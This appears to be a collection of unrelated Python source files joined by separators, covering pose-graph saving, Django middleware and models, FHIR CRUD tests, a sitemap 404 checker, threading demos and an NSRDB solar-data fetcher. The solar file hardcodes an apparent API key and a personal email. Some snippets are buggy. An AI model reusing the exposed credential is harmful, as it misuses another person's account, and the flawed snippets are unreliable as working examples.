yaw_rad = np.deg2rad(yaw_deg)
return eulerAnglesToRotationMatrix([0, 0, yaw_rad])
def yawdeg2se3(yaw_deg):
se3 = np.eye(4)
se3[:3, :3] = yawdeg2so3(yaw_deg)
return se3
def getGraphNodePose(graph, idx):
pose = graph.at(minisam.key('x', idx))
pose_trans = pose.translation()
pose_rot = pose.so3().matrix()
return pose_trans, pose_rot
def saveOptimizedGraphPose(curr_node_idx, graph_optimized, filename):
for opt_idx in range(curr_node_idx):
pose_trans, pose_rot = getGraphNodePose(graph_optimized, opt_idx)
pose_trans = np.reshape(pose_trans, (-1, 3)).squeeze()
pose_rot = np.reshape(pose_rot, (-1, 9)).squeeze()
optimized_pose_ith = np.array([pose_rot[0], pose_rot[1], pose_rot[2], pose_trans[0],
pose_rot[3], pose_rot[4], pose_rot[5], pose_trans[1],
pose_rot[6], pose_rot[7], pose_rot[8], pose_trans[2],
0.0, 0.0, 0.0, 0.1])
if (opt_idx == 0):
optimized_pose_list = optimized_pose_ith
else:
optimized_pose_list = np.vstack((optimized_pose_list, optimized_pose_ith))
np.savetxt(filename, optimized_pose_list, delimiter=",")
class PoseGraphResultSaver:
def __init__(self, init_pose, save_gap, num_frames, seq_idx, save_dir):
self.pose_list = np.reshape(init_pose, (-1, 16))
self.save_gap = save_gap
self.num_frames = num_frames
self.seq_idx = seq_idx
self.save_dir = save_dir
self.rel_pose_list = None
def saveRelativePose(self, rel_pose):
if self.rel_pose_list is not None:
self.rel_pose_list = np.vstack((self.rel_pose_list, np.reshape(rel_pose, (-1, 16))))
else:
self.rel_pose_list = np.reshape(rel_pose, (-1, 16))
def saveUnoptimizedPoseGraphResult(self, cur_pose, cur_node_idx):
# save
self.pose_list = np.vstack((self.pose_list, np.reshape(cur_pose, (-1, 16))))
# write
if (cur_node_idx % self.save_gap == 0 or cur_node_idx == self.num_frames):
# save odometry-only poses
filename = "pose" + self.seq_idx + "unoptimized_" + str(getUnixTime()) + ".csv"
filename = os.path.join(self.save_dir, filename)
np.savetxt(filename, self.pose_list, delimiter=",")
def saveOptimizedPoseGraphResult(self, cur_node_idx, graph_optimized):
filename = "pose" + self.seq_idx + "optimized_" + str(getUnixTime()) + ".csv"
filename = os.path.join(self.save_dir, filename)
saveOptimizedGraphPose(cur_node_idx, graph_optimized, filename)
optimized_pose_list = np.loadtxt(open(filename, "rb"), delimiter=",", skiprows=1)
self.pose_list = optimized_pose_list # update with optimized pose
def vizCurrentTrajectory(self, fig_idx):
x = self.pose_list[:, 3]
y = self.pose_list[:, 7]
z = self.pose_list[:, 11]
fig = plt.figure(fig_idx)
plt.clf()
plt.plot(-y, x, color='blue') # kitti camera coord for clarity
plt.axis('equal')
plt.xlabel('x', labelpad=10)
plt.ylabel('y', labelpad=10)
plt.draw()
plt.pause(0.01) # is necessary for the plot to update for some reason
def saveFinalPoseGraphResult(self, filename):
filename = os.path.join(self.save_dir, filename)
np.savetxt(filename, self.pose_list[:, :12])
def saveRelativePosesResult(self, filename):
filename = os.path.join(self.save_dir, filename)
np.savetxt(filename, self.rel_pose_list[:, :12])
|
#import sys
#input = sys.stdin.readline
from itertools import permutations
def main():
N = int(input())
ans = [0]*(N**2+1)
for p in permutations(range(N)):
a = 0
for i in range(N):
a += abs(i-p[i])
ans[a] += 1
print(ans)
if __name__ == '__main__':
main()
|
autor = "VOV"
version = "1.0.0"
|
import logging
import sys
import datetime
import uuid
from django.conf import settings
class RequestTimeLoggingMiddleware(object):
"""Middleware class logging request time to stderr.
This class can be used to measure time of request processing
within Django. It can be also used to log time spent in
middleware and in view itself, by putting middleware multiple
times in INSTALLED_MIDDLEWARE.
Static method `log_message' may be used independently of the
middleware itself, outside of it, and even when middleware is not
listed in INSTALLED_MIDDLEWARE.
"""
@staticmethod
def log_message(request, tag, message=''):
"""Log timing message to stderr.
Logs message about `request' with a `tag' (a string, 10
characters or less if possible), timing info and optional
`message'.
Log format is "timestamp tag uuid count path +delta message"
- timestamp is microsecond timestamp of message
- tag is the `tag' parameter
- uuid is the UUID identifying request
- count is number of logged message for this request
- path is request.path
- delta is timedelta between first logged message
for this request and current message
- message is the `message' parameter.
"""
dt = datetime.datetime.utcnow()
if not hasattr(request, '_logging_uuid'):
request._logging_uuid = uuid.uuid1()
request._logging_start_dt = dt
request._logging_pass = 0
request._logging_pass += 1
print >> sys.stderr, (
u'%s %-10s %s %2d %s +%s %s' % (
dt.isoformat(),
tag,
request._logging_uuid,
request._logging_pass,
request.path,
dt - request._logging_start_dt,
message,
)
).encode('utf-8')
def process_request(self, request):
self.log_message(request, 'request ')
def process_response(self, request, response):
s = getattr(response, 'status_code', 0)
r = str(s)
if s in (300, 301, 302, 307):
r += ' => %s' % response.get('Location', '?')
elif response.content:
r += ' (%db)' % len(response.content)
self.log_message(request, 'response', r)
return response
from django.db import connection
from django.utils.log import getLogger
logger = getLogger(__name__)
class QueryCountDebugMiddleware(object):
"""
This middleware will log the number of queries run
and the total time taken for each request (with a
status code of 200). It does not currently support
multi-db setups.
"""
def process_response(self, request, response):
if response.status_code == 200:
total_time = 0
for query in connection.queries:
if getattr(settings, 'PRINT_QUERIES', False):
print query
query_time = query.get('time')
if query_time is None:
# django-debug-toolbar monkeypatches the connection
# cursor wrapper and adds extra information in each
# item in connection.queries. The query time is stored
# under the key "duration" rather than "time" and is
# in milliseconds, not seconds.
query_time = query.get('duration', 0) / 1000
total_time += float(query_time)
logger.debug('%s queries run, total %s seconds' % (len(connection.queries), total_time))
return response |
from queries import Query
class Base:
def __init__(self, state_controller):
self.sdk = state_controller.sdk
self.controller = state_controller
# todo remove this var
self.queries = Query(self.sdk)
self.response_phrases = {}
async def before(self, payload, data):
"""
State's before called when user enters this state.
Controller's goto() and reenter() fire this function.
:param payload:
:param data:
:return:
"""
pass
async def process(self, payload, data):
"""
Process function called on a new user's message while he is in a state.
Anyone can fire this function for current state by calling Controller's
process() function.
:param payload:
:param data:
:return:
"""
pass
# todo add a function to parse user's response (choose right in self.response_phrases)
# todo add regex support
|
# @Time : 2018/4/3 9:57
# @Author : Jing Xu
import sys,re,types
class NotIntegerError(Exception):
pass
class OutOfRangeError(Exception):
pass
_MAPPING = (u'零', u'一', u'二', u'三', u'四', u'五', u'六', u'七', u'八', u'九',)
_P0 = (u'', u'十', u'百', u'千',)
_S4, _S8, _S16 = 10 ** 4, 10 ** 8, 10 ** 16
_MIN, _MAX = 0, 9999999999999999
def _to_chinese4(num):
'''转换[0, 10000)之间的阿拉伯数字
'''
assert (0 <= num and num < _S4)
if num < 10:
return _MAPPING[num]
else:
lst = []
while num >= 10:
lst.append(num % 10)
num = num / 10
lst.append(num)
c = len(lst) # 位数
result = u''
for idx, val in enumerate(lst):
if val != 0:
result += _P0[idx] + _MAPPING[val]
if idx < c - 1 and lst[idx + 1] == 0:
result += u'零'
return result[::-1].replace(u'一十', u'十')
def _to_chinese8(num):
assert (num < _S8)
to4 = _to_chinese4
if num < _S4:
return to4(num)
else:
mod = _S4
high, low = num / mod, num % mod
if low == 0:
return to4(high) + u'万'
else:
if low < _S4 / 10:
return to4(high) + u'万零' + to4(low)
else:
return to4(high) + u'万' + to4(low)
def _to_chinese16(num):
assert (num < _S16)
to8 = _to_chinese8
mod = _S8
high, low = num / mod, num % mod
if low == 0:
return to8(high) + u'亿'
else:
if low < _S8 / 10:
return to8(high) + u'亿零' + to8(low)
else:
return to8(high) + u'亿' + to8(low)
def to_chinese(num):
if type(num) != int:
raise NotIntegerError(u'%s is not a integer.' % num)
if num < _MIN or num > _MAX:
raise OutOfRangeError(u'%d out of range[%d, %d)' % (num, _MIN, _MAX))
if num < _S4:
return _to_chinese4(num)
elif num < _S8:
return _to_chinese8(num)
else:
return _to_chinese16(num)
def start_window():
'''
起始界面
:param: number:待计算表达式
:return: 返回有内容的输入
'''
start_info = "数字转换"
print( start_info.center( 50, "*" ), "\n" )
while True:
# number = input( "请输入你要转换的数字[q:退出]:\n" ).strip()
number = "123456.78"
if number == "q" or number == "Q":
sys.exit("关闭程序")
elif len(number) == 0:
continue
else:
return number
def format_string(string):
'''
格式整理,包括正负关系判断和去除空格
:param string: 待整理格式的表达式
:return: 返回去除多余正负号和空格的表达式
'''
string = string.replace('--', '+')
string = string.replace('-+', '-')
string = string.replace('+-', '-')
string = string.replace('++', '+')
string = string.replace(' ', '')
return string
def trans(number):
point = "."
num = ['零', '一', '二', '三', '四', '五', '六', '七', '八', '九']
trans_decimal = ""
if re.findall( point, number ):
number, decimal = number.split( point )
decimal_list = []
for index in decimal:
decimal_list.append(num[int(index)])
trans_decimal = "".join(decimal_list)
return number, trans_decimal
if __name__ == "__main__":
number = start_window()
number = format_string(number)
number, trans_decimal = trans(number)
number = to_chinese(int(number))
if trans_decimal:
number = "".join([number, "点", trans_decimal])
print(number)
|
# TODO:
# 1. why do we need to compile the example in order to build the library in lib?
# 2. related: compiling with too many processors causes some example executable to try to load the gmedia library even when it's not build. How to prevent that?
# 3. finish the export=env for various libraries
from init_env import init_environment
# each library has also an SConstruct to build the example
env = init_environment("mlibrary qt5 clhep geant4")
options = SConscript('options/SConscript')
textProgressBar = SConscript('textProgressBar/SConscript')
translationTable = SConscript('translationTable/SConscript')
splash = SConscript('splash/SConscript')
gruns = SConscript('gruns/SConscript')
frequencySyncSignal = SConscript('frequencySyncSignal/SConscript')
gstring = SConscript('gstring/SConscript')
qtButtonsWidget = SConscript('qtButtonsWidget/SConscript')
gvolume = SConscript('gvolume/SConscript')
g4display = SConscript('g4display/SConscript', exports='env')
g4volume = SConscript('g4volume/SConscript')
gtouchable = SConscript('gtouchable/SConscript')
ghit = SConscript('ghit/SConscript', exports='env')
gdynamic = SConscript('gdynamic/SConscript', exports='env')
gdata = SConscript('gdata/SConscript', exports='env')
gmedia = SConscript('gmedia/SConscript', exports='env')
Depends(gmedia, gdata)
# output plugins
gmediaDLLS = SConscript('gmedia/SConscriptDLL')
Depends(gmediaDLLS, gmedia)
|
import pytest
import pdb
#from fhir_walk.model.organization import organization
from fhir_walk.model import unwrap_bundle
from fhireval.test_suite.crud import prep_server
test_id = f"{'2.2.10':<10} - CRUD PractionerRole"
test_weight = 2
# Cache the ID to simplify calls made after crate
example_practitioner_id = None
example_practitioner_role_id = None
example_organization_id = None
def test_create_research_practitioner_role(host, prep_server):
global example_practitioner_id, example_practitioner_role_id, example_organization_id
example_organization = prep_server['Common-Examples']['Organization'][0]
example_practitioner = prep_server['Common-Examples']['Practitioner'][0]
example_practitioner_role = prep_server['Common-Examples'][
'PractitionerRole'][0]
response = host.post('Practitioner',
example_practitioner,
validate_only=False)
assert response['status_code'] == 201, 'CREATE success'
example_practitioner_id = response['response']['id']
response = host.post('Organization',
example_organization,
validate_only=False)
assert response['status_code'] == 201, 'CREATE success'
example_organization_id = response['response']['id']
# We have to do some tweaking to the references used by Practitioner_role
example_practitioner_role['practitioner'][
'reference'] = f"Practitioner/{example_practitioner_id}"
example_practitioner_role['organization'][
'reference'] = f"Organization/{example_organization_id}"
response = host.post('PractitionerRole',
example_practitioner_role,
validate_only=False)
assert response['status_code'] == 201, 'PractitionerRole CREATE success'
example_practitioner_role_id = response['response']['id']
def test_read_research_practitioner_role(host, prep_server):
global example_practitioner_id, example_practitioner_role_id, example_organization_id
example_practitioner_role = prep_server['Common-Examples'][
'PractitionerRole'][0]
practitioner_query = host.get(
f"PractitionerRole/{example_practitioner_role_id}").entries
assert len(practitioner_query) == 1, "READ Success and only one was found"
# Just make sure we got what we expected
assert example_practitioner_role['code'][0]['coding'][0][
'display'] == practitioner_query[0]['code'][0]['coding'][0][
'display'], 'Verify Code matches'
assert example_practitioner_role[
'active'], "Make sure that active is true so we can patch-change it"
def test_update_research_practitioner_role(host, prep_server):
global example_practitioner_id, example_practitioner_role_id, example_organization_id
example_practitioner_role = prep_server['Common-Examples'][
'PractitionerRole'][0]
altered_practitioner_role = example_practitioner_role.copy()
altered_practitioner_role['code'][0]['coding'][0][
'display'] = 'Research Investigator Person'
altered_practitioner_role['id'] = example_practitioner_role_id
result = host.update('PractitionerRole', example_practitioner_role_id,
altered_practitioner_role)
assert result['status_code'] == 200
practitioner_qry = host.get(
f"PractitionerRole/{example_practitioner_role_id}").entries
assert len(practitioner_qry) == 1, "READ success and only one was found"
assert practitioner_qry[0]['code'][0]['coding'][0][
'display'] == 'Research Investigator Person'
def test_patch_research_practitioner_role(host, prep_server):
global example_practitioner_id, example_practitioner_role_id, example_organization_id
patch_ops = [{"op": "replace", "path": "/active", "value": False}]
result = host.patch('PractitionerRole', example_practitioner_role_id,
patch_ops)
assert result['status_code'] == 200
practitioner_qry = result['response']
assert not practitioner_qry['active']
def test_delete_research_practitioner_role(host, prep_server):
global example_practitioner_id, example_practitioner_role_id, example_organization_id
delete_result = host.delete_by_record_id('PractitionerRole',
example_practitioner_role_id)
assert delete_result['status_code'] == 200
delete_result = host.delete_by_record_id('Practitioner',
example_practitioner_id)
assert delete_result['status_code'] == 200
delete_result = host.delete_by_record_id('Organization',
example_organization_id)
assert delete_result['status_code'] == 200
|
# -*- coding: utf-8 -*-
import urllib
from docutils import nodes
from docutils.parsers.rst import directives
from sphinx.util.compat import Directive
class googlemaps_legacy(nodes.General, nodes.Element):
pass
class GoogleMapsDirective(Directive):
"""Directive for embedding google-maps"""
has_content = False
required_arguments = 0
optional_arguments = 1
final_argument_whitespace = True
option_spec = {
"lang": unicode,
"saddr": unicode,
"daddr": unicode,
"dirflg": directives.single_char_or_unicode,
"latitude": float,
"longtitude": float,
"zoom": directives.nonnegative_int,
}
def run(self):
node = googlemaps_legacy()
if self.arguments:
node["query"] = " ".join(self.arguments)
for key in self.option_spec.keys():
if self.options.has_key(key):
node[key] = self.options[key]
return [node]
def visit_googlemaps_node(self, node):
params = dict(f="q",
t="m",
om=0,
ie="UTF8",
oe="UTF8",
output="embed")
if "lang" in node:
params["hl"] = node["lang"].encode("utf-8")
if "query" in node:
params["q"] = node["query"].encode("utf-8")
if "saddr" in node:
params["saddr"] = node["saddr"].encode("utf-8")
if "daddr" in node:
params["daddr"] = node["daddr"].encode("utf-8")
if "dirflg" in node:
params["dirflg"] = node["dirflg"].encode("utf-8")
if "latitude" in node and "longtitude" in node:
params["ll"] = "%f,%f" % (node["latitude"], node["longtitude"])
if "zoom" in node:
params["z"] = str(node["zoom"])
baseurl = "http://maps.google.com/maps?"
iframe = """<iframe width="600" height="350" frameborder="0"
scrolling="no" marginheight="0"
marginwidth="0" src="%s">
</iframe>"""
url = baseurl + urllib.urlencode(params)
self.body.append(iframe % url)
def depart_googlemaps_node(self, node):
pass
def setup(app):
app.add_node(googlemaps_legacy,
html=(visit_googlemaps_node, depart_googlemaps_node))
app.add_directive("google-maps-legacy", GoogleMapsDirective)
|
from mongodb import MongoTable
from migrate_data import migrate_data
import yaml
import os
class Args():
def __init__(self):
self.dir = "/home/pybeef/workspace/data"
self.config = "/home/pybeef/workspace/leancloud-backup/gen_schema_config.yml"
self.table = "Cow"
self.data_dir = "/home/pybeef/workspace/dump_data/"
self.error_dir = "/home/pybeef/err_table/"
self.test = True
args = Args()
def main():
with open(args.config) as f:
config = yaml.load(f.read())
ignore_tables = config.get("ignore_tables", [])
if args.table is None:
for t in MongoTable.iter_tables(args.dir):
if t.name in ignore_tables:
continue
migrate_data(t, config)
elif args.table in ignore_tables:
print("%s is an ignored table" % args.table)
else:
p = os.path.join(args.dir, "%s_all.json" % args.table)
t = MongoTable.get_table(p)
migrate_data(args, t, config)
if __name__ == "__main__":
main()
|
from rest_framework import serializers
from .models import Delivery, Parcel
class ParcelSerializer(serializers.ModelSerializer):
class Meta:
model = Parcel
fields = '__all__'
class ParcelSerializerRead(serializers.ModelSerializer):
class Meta:
model = Parcel
fields = (
"length",
"width",
"height",
"weight",
"real_length",
"real_width",
"real_height",
"real_weight",
"total_weight",
"over_weight",
)
class DeliverySerializer(serializers.ModelSerializer):
parcel = ParcelSerializer()
def create(self, validated_data):
instance = Delivery.objects.create(**validated_data)
parcel = validated_data['parcel']
parcel['delivery'] = instance.id
parcel_created = ParcelSerializer(data=parcel)
parcel_created.is_valid(raise_exception=True)
parcel_created = parcel_created.save()
return instance
class Meta:
model = Delivery
fields = (
"id",
"tracking_number",
"carrier",
"parcel",
)
class DeliveryReadSerializer(serializers.ModelSerializer):
parcel = serializers.SerializerMethodField()
def get_parcel(self, obj):
parcel_obj = Parcel.objects.filter(delivery_id=obj.id).first()
parcel = ParcelSerializerRead(parcel_obj).data
return parcel
class Meta:
model = Delivery
fields = (
"id",
"tracking_number",
"carrier",
"parcel",
)
|
from django.db import models
from django.contrib.auth.models import User
# Create your models here.
class Message(models.Model):
sender = models.ForeignKey(User, related_name='message_user')
recipient = models.ForeignKey(User, related_name='message_target')
subject = models.CharField(max_length=100)
body = models.TextField()
encrypted = models.BooleanField() |
import sys
import textwrap
import traceback
import urllib
import xbmc
import datetime
import time
import _strptime
import config
DATE_FORMAT = "%Y-%m-%d %H:%M:%S.%f"
def log(s):
xbmc.log("[%s v%s] %s" % (config.NAME, config.VERSION, s), level=xbmc.LOGNOTICE)
def log_error(message=None):
exc_type, exc_value, exc_traceback = sys.exc_info()
if message:
exc_value = message
xbmc.log("[%s v%s] ERROR: %s (%d) - %s" % (
config.NAME, config.VERSION, exc_traceback.tb_frame.f_code.co_name, exc_traceback.tb_lineno, exc_value),
level=xbmc.LOGNOTICE)
traceback.print_exc()
def dialog_error(msg):
# Generate a list of lines for use in XBMC dialog
content = []
exc_type, exc_value, exc_traceback = sys.exc_info()
content.append("%s v%s Error" % (config.NAME, config.VERSION))
content.append("%s (%d) - %s" % (exc_traceback.tb_frame.f_code.co_name, exc_traceback.tb_lineno, msg))
content.append(str(exc_value))
return content
def dialog_message(msg, title=None):
if not title:
title = "%s v%s" % (config.NAME, config.VERSION)
# Add title to the first pos of the textwrap list
content = textwrap.wrap(msg, 60)
content.insert(0, title)
return content
def get_url(s):
dict = {}
pairs = s.lstrip("?").split("&")
for pair in pairs:
if len(pair) < 3: continue
kv = pair.split("=", 1)
k = kv[0]
v = urllib.unquote_plus(kv[1])
dict[k] = v
return dict
def isEmpty(param):
if param is None or param == "":
return True
def dateFromString(string, fmt=DATE_FORMAT):
# Workaround from https://forum.kodi.tv/showthread.php?tid=112916
try:
res = datetime.datetime.strptime(string, fmt)
except TypeError:
res = datetime.datetime(*(time.strptime(string, fmt)[0:6]))
return res
def dateFromUnix(string):
return datetime.datetime.utcfromtimestamp(string)
def unixTSFromDateString(string):
dt=datetime.datetime(*(time.strptime(string, "%Y-%m-%d")[:6]))
return int((dt - datetime.datetime(1970, 1, 1)).total_seconds())
def stringFromDateNow():
return datetime.datetime.now().strftime(DATE_FORMAT)
|
# flake8: noqa: F401
from .monero_transaction import MoneroTransaction
|
import requests
from time import sleep
array = []
file = open("sitemap.xml", 'r')
out = open("htaccess.txt", "w+")
count = 0
print("Working...\n")
for line in file:
if("<loc>" in line):
line = line.strip()
line = line[5:-6]
print("Checking URL " + line)
if(requests.get(line).status_code == 404):
print("404 Error found at URL " + line)
print("Adding to file...")
line = line.replace("https://", "")
line = line.replace("http://", "")
start = line.find('/')
url = line[start:]
out.write("Redirect 301 " + url + " [NEW_URL_HERE]\n")
print("URL added.\n")
count += 1
else:
print("Above URL has been verified and does not return a 404 error.\n")
print(str(count) + " URLs added to htaccess.txt file.")
print("Email me at bradan@conceptmarketing.com.au if you encounter any issues.")
for i in range(10):
k = 10-i
print("Closing program in " + str(k) + " seconds")
sleep(1) |
# Generated by Django 2.0.2 on 2018-05-30 05:43
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('login', '0003_auto_20180530_0540'),
]
operations = [
migrations.RenameField(
model_name='article',
old_name='c_time',
new_name='createtime',
),
migrations.RenameField(
model_name='bannerinfo',
old_name='c_time',
new_name='createtime',
),
]
|
# 使用函数来实现多多任务的封装
import threading
import time
def sing():
for i in range(5):
print("{}---sing---".format(threading.current_thread().name))
time.sleep(1)
def dance():
for i in range(10):
print("{}---dance---".format(threading.current_thread().name))
time.sleep(1)
def main():
print("start:", end="")
print(threading.enumerate())
t1 = threading.Thread(target=sing,name="sing")
t2 = threading.Thread(target=dance,name="dance")
# 如果是run,则都是主线程去执行,threading.current_thread().name都是MainThread
# t1.run()
# t2.run()
print("second:", end="")
print(threading.enumerate())
t1.start()
t2.start()
print("third:", end="")
print(threading.enumerate())
# 获取当前进程中线程数量
while True:
print(threading.enumerate())
#print("当前线程数量为:%d" % (len(threading.enumerate())))
if len(threading.enumerate()) <= 1:
break
time.sleep(1)
if __name__ == "__main__":
main() |
__author__ = 'Leonel Gonzalez'
from esfera import *
from DecimalBinario import *
from memoria_estatica import *
Esferita = Esfera(56)
"""
print "El radio es:" , Esferita.getRadio()
print "El diametro es:" , Esferita.getDiametro()
print "La circunferencia es: ", Esferita.getCircunferencia()
print "El area es: ", Esferita.getArea()
print "El volumen es: ", Esferita.getVolumen()
arreglo = memoria_estatica()
arreglo.recorrerArreglo()
print 'Agregar elemento'
elemento = raw_input()
arreglo.agregarelementoarray(elemento)
arreglo.recorrerArreglo()
promedio = 9.67
otralista = []
supermercado = ['fruta','agua', 'refresco', 'pan', 'pastel']
estructuradedatos = ['agustin pimentel', 'francisco pineda', 'enrique bello']
precios = [12, 34, 45, 47]
porcentajes = [.34, .56, .12, 1.2]
listas = memDinamica(supermercado)
listas.imprimirLista()
listas.ordenarLista()
listas.imprimirLista()
listas.agregarelementoarray('cerveza')
listas.imprimirLista()
lista2 = memDinamica(precios)
lista2.imprimirLista()
lista2.agregarelementoarray(89)
lista2.imprimirLista()
"""
numero = convertidor()
print (numero.decimalABinario(10))
print (numero.decimalAOctal(8)) |
#!/usr/bin/python
# -*- coding: utf-8 -*-
# @author: Xiangwan
import time
t = time.time()
print '当前时间戳为: ', t
localtime = time.localtime(time.time())#获取当地时间下的时间元组,tm_isdst=0因为是夏令时,否则为1
print '本地时间为: ', localtime#定义的localtime可以改
localtime2 = time.asctime(time.localtime(time.time()))#用时间元组获取格式化的时间
print '本地时间为: ', localtime2
print time.strftime('%Y-%m-%d %H:%M:%S', time.localtime())#格式化日期
print time.strftime('%a %b %d %H:%M:%S %Y', time.localtime())#同上,接收以时间元组,并返回以可读字符串表示的当地时间,格式由fmt决定。
a = 'Tue Jul 25 16:27:24 2017'
print time.mktime(time.strptime(a,'%a %b %d %H:%M:%S %Y'))#time.strptime(str,fmt='%a %b %d %H:%M:%S %Y')是根据fmt的格式把时间字符再解析为时间元组
#time.mktime()是接受时间元组并返回时间戳,所以这里写localtime(time.time())也可以
print 'time altzone %d ' % time.altzone#函数返回格林威治西部的夏令时地区的偏移秒数,China在格林威治的东部,所以为负(也包括英国,西欧)
localtime3 = time.gmtime(time.time())#tm_isdst始终为0
print '格林威治时间为:', localtime3
t0 = time.clock()#计算系统进程运行的真实时间,很精确..电脑好慢啊!
print time.clock()
def procedure():
time.sleep(5)#推迟程序运行的时间——这里是5秒
t1 = time.time()
procedure()
print time.time() - t1
import calendar#获取某月日历
cal = calendar.month(2017,7)
print '以下输出2017年7月份的日历:'
print cal
print calendar.isleap(2017)#检查是否是闰年
print calendar.leapdays(1991,2017)#计算1991-2917年之间的闰年总数
|
from django.db import models
from cloudinary.models import CloudinaryField
from django.contrib.auth.models import User
# Create your models here.
class Watch(models.Model):
# User details
user = models.ForeignKey(User, on_delete=models.SET_NULL, null=True)
# Watch brand - prefix brand options
WATCH_BRAND = [
('ROLEX', 'ROLEX'),
('OMEGA', 'OMEGA'),
('HUBLOT', 'HUBLOT'),
]
watch_brand = models.CharField(
max_length=30,
choices=WATCH_BRAND,
default='ROLEX',
blank=False
)
# Allow user to enter watch model
watch_model = models.CharField(
max_length=100,
blank=False
)
# Description for the watch
description = models.TextField(max_length=500)
# Sale price of the watch
price = models.IntegerField(
blank=False,
)
# Watch available for sale
STATUS = [
('Available', 'Available'),
('Sold', 'Sold'),
]
status = models.CharField(
max_length=10,
choices=STATUS,
default='Available'
)
# Picture for the watch
cover = CloudinaryField('image')
def __str__(self):
return (self.watch_brand + " " + self.watch_model)
|
__author__ = 'tangjia'
import urllib2
import cookielib
import requests
headers = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/600.4.8 (KHTML, like Gecko) Version/8.0.3 Safari/600.4.8'}
# response = urllib2.urlopen("http://www.javlibrary.com/cn/");
tbLoginUrl = "http://fahai.gnetconferencing.com/tomain.do"
file = "cookie.txt"
cookie = cookielib.CookieJar(file);
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor)
taobao = urllib2.urlopen(tbLoginUrl)
resp = taobao.read().decode("gbk")
print(resp)
# urllib2.install_opener(opener)
# response = opener.open(tbLoginUrl)
# content = response.read()
# print(content)
|
from datos.connection import Connection
class AlumnoData():
@staticmethod
def crearAlumno(alumno):
db = Connection.connect()
nuevo = db.alumnos
nuevo.insert_one(alumno)
@staticmethod
def traerAlumnos():
db = Connection.connect()
lista = db.alumnos.find({})
return lista
|
class Solution(object):
def removeDuplicates(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
return list(set(nums))
nums = [1,1,2]
a = Solution()
print(a.removeDuplicates(nums))
# https://leetcode-cn.com/problems/remove-duplicates-from-sorted-array/ |
class Employee:
company = "Google"
salary = 100
saquib = Employee()
md = Employee()
saquib.salary = 5000
# md.salary = 6000
print(saquib.salary)
print(md.salary)
saquib.company = "Fortuitycorps"
print(saquib.company)
|
from PySAM.PySSC import *
import pandas as pd
import numpy as np
import requests,io
from scipy.stats import norm
from scipy import linalg
from math import sqrt,exp,log,cos,pi
class SolarSite(object):
""" Pull NSRDB site by sending a request.
Parameters
----------
lat : float
Latitude in decimal degrees
lon : float
Longitude in decimal degrees
"""
def __init__(self, lat,lon):
self.lat = lat
self.lon = lon
def get_nsrdb_data(self,year,leap_year,interval,utc):
""" Pull NSRDB site by sending a request.
Parameters
----------
year : int
Choose year of data. May take any value in the interval [1998,2019]
leap_year : bool
Set leap year to true or false. True will return leap day data if present, false will not.
interval: string
Set time interval in minutes, i.e., '30' is half hour intervals. Valid intervals are 30 & 60.
utc : bool
Specify Coordinated Universal Time (UTC), 'true' will use UTC, 'false' will use the local time zone of the data.
NOTE: In order to use the NSRDB data in SAM, you must specify UTC as 'false'. SAM requires the data to be in the
local time zone.
"""
api_key = 'KgmyZTqyzgQOOjuWoMxPgMEVVMAG0kMV521gJPVv' # NSRDB api key
attributes = 'ghi,clearsky_ghi,dhi,clearsky_dhi,dni,clearsky_dni,wind_speed,air_temperature,cloud_type,fill_flag,wind_direction'
your_name = 'pySODA' # Your full name, use '+' instead of spaces.
reason_for_use = 'Distributed+PV+Generation' # Your reason for using the NSRDB.
your_affiliation = 'LBNL-ASU' # Your affiliation
your_email = 'ilosadac@asu.edu' # Your email address
mailing_list = 'false'
# Declare url string
url = 'https://developer.nrel.gov/api/solar/nsrdb_psm3_download.csv?wkt=POINT({lon}%20{lat})&names={year}&leap_day={leap}&interval={interval}&utc={utc}&full_name={name}&email={email}&affiliation={affiliation}&mailing_list={mailing_list}&reason={reason}&api_key={api}&attributes={attr}'\
.format(year=year, lat=self.lat, lon=self.lon, leap=str(leap_year).lower(), interval=interval,\
utc=str(utc).lower(), name=your_name, email=your_email, mailing_list=mailing_list, \
affiliation=your_affiliation, reason=reason_for_use, api=api_key, attr=attributes)
# Return just the first 2 lines to get metadata:
r=requests.get(url)
if r.status_code==400:
raise NameError(r.json()["errors"][0])
meta = pd.read_csv(io.StringIO(r.content.decode('utf-8')),nrows=1).T
df = pd.read_csv(io.StringIO(r.content.decode('utf-8')),skiprows=2)
idx = pd.date_range(start='1/1/{yr}'.format(yr=year), freq=interval+'Min', end='12/31/{yr} 23:59:00'.format(yr=year))
if leap_year==False:
idx = idx[(idx.day != 29) | (idx.month != 2)]
df=df.set_index(idx)
self.resource_data = df
self.meta_resource_data = meta.T.to_dict('r')[0]
return df
def generate_solar_power_from_nsrdb(self,clearsky,capacity,DC_AC_ratio,tilt,azimuth,inv_eff,losses,array_type,year = None,leap_year = None,interval = None,utc = None):
""" Generate PV power time series.
Parameters
----------
clearsky : bool
True returns clearsky power, false returns "simulated" output
capacity : float
System capacity in MW
DC_AC_ratio : float
DC/AC ratio (or power ratio). See https://sam.nrel.gov/sites/default/files/content/virtual_conf_july_2013/07-sam-virtual-conference-2013-woodcock.pdf
tilt : float
Tilt of system in degrees
azimuth : float
Azimuth angle (in degrees) from north (0 degrees)
inv_eff : float
Inverter efficiency (in %)
losses : float
Total system losses (in %)
array_type : int
# Specify PV configuration (0=Fixed, 1=Fixed Roof, 2=1 Axis Tracker, 3=Backtracted, 4=2 Axis Tracker)
year : int
Year of data. May take any value in the interval [1998,2018]
leap_year : bool
Leap year to true or false. True will return leap day data if present, false will not.
interval: string
Time interval in minutes, i.e., '30' is half hour intervals. Valid intervals are 30 & 60.
utc : bool
Specify Coordinated Universal Time (UTC), 'true' will use UTC, 'false' will use the local time zone of the data.
NOTE: In order to use the NSRDB data in SAM, you must specify UTC as 'false'. SAM requires the data to be in the
local time zone.
"""
if not hasattr(self,"resource_data"):
args = [arg==None for arg in [year,leap_year,interval,utc]]
if any(args):
raise NameError("Missing input: year,leap_year,interval,utc")
else:
self.year = year
self.leap_year = leap_year
self.interval = interval
self.utc = utc
IrradianceData.get_nsrdb_data(self)
if clearsky==True:
clearsky_str="Clearsky "
else:
clearsky_str=""
ssc = PySSC()
# Resource inputs for SAM model:
wfd = ssc.data_create()
ssc.data_set_number(wfd, 'lat'.encode('utf-8'), self.lat)
ssc.data_set_number(wfd, 'lon'.encode('utf-8'), self.lon)
ssc.data_set_number(wfd, 'tz'.encode('utf-8'), self.meta_resource_data["Time Zone"])
